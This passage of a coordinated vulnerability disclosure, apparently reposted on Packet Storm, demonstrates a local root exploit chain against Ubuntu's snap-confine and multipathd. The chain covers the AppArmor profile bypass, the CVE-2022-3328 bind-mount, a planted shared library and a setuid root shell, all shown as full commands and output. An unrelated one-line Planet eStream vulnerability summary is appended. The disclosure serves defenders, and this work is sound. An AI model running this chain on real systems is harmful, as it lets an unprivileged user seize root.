operations:------------------------------------------------------------------------# apparmor_parser -K -a << "EOF"/usr/lib/snapd/snap-confine (enforce) {capability,network,mount,remount,umount,pivot_root,ptrace,signal,dbus,unix,file,change_profile,}EOF------------------------------------------------------------------------Back in the initial namespace, we check that our "allow all" AppArmorprofile still exists:------------------------------------------------------------------------# aa-statusapparmor module is loaded.32 profiles are loaded.32 profiles are in enforce mode.   ...   :failed_wwids:/usr/lib/snapd/snap-confine------------------------------------------------------------------------Last, we make sure that snap-confine accepts our "allow all" AppArmorprofile (i.e., AppArmor is bypassed, and snap-confine is effectivelyunconfined):------------------------------------------------------------------------$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent...DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confineDEBUG: apparmor mode is: enforce------------------------------------------------------------------------We can therefore bind-mount /tmp onto an arbitrary directory in thefilesystem (by exploiting CVE-2022-3328); since we already depend onmultipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath,create our own shared library /lib/multipath/libchecktur.so, shutdownmultipathd (by exploiting CVE-2022-41974), restart multipathd (throughits Unix socket), and finally obtain full root privileges (becausemultipathd executes our shared library as root when it restarts):------------------------------------------------------------------------$ grep multipath /proc/self/mountinfo | wc      0       0       0$ gcc -o CVE-2022-3328 CVE-2022-3328.c$ ./CVE-2022-3328scratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c$ grep multipath /proc/self/mountinfo1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw...$ gcc -fpic -shared -o /lib/multipath/libchecktur.so libtmpsh.c$ ps -ef | grep 'multipath[d]'root         371       1  0 12:42 ?        00:00:00 /sbin/multipathd -d -s$ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quitok$ ps -ef | grep 'multipath[d]' | wc      0       0       0$ ls -l /tmp/shls: cannot access '/tmp/sh': No such file or directory$ multipathd list daemonerror -104 receiving packet$ ls -l /tmp/sh-rwsr-xr-x 1 root root 125688 Aug  6 14:55 /tmp/sh$ /tmp/sh -p# iduid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup)                                     ^^^^^^^^^^^^------------------------------------------------------------------------========================================================================Acknowledgments========================================================================We thank the Ubuntu security team (Alex Murray and Seth Arnold inparticular) and the snapd team for their hard work on this snap-confinevulnerability. We also thank the members of linux-distros@openwall.========================================================================Timeline========================================================================2022-08-23: Contacted security@ubuntu.2022-11-28: Contacted linux-distros@openwall.2022-11-30: Coordinated Release Date (17:00 UTC).

snap-confine must_mkdir_and_open_with_perms() Race Condition

Planet eStream versions prior to 6.72.10.07 suffer from shell upload, account takeover, broken access control, SQL injection, both persistent and reflective cross site scripting, path traversal, and information disclosure vulnerabilities.

Source

Packet Storm